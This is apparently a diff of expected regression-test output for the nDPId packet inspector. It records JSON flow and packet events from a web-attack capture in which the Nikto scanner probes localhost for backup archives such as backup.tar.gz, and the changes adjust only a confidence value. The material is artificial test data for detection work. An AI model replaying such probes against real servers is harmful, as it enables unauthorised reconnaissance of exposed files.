-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
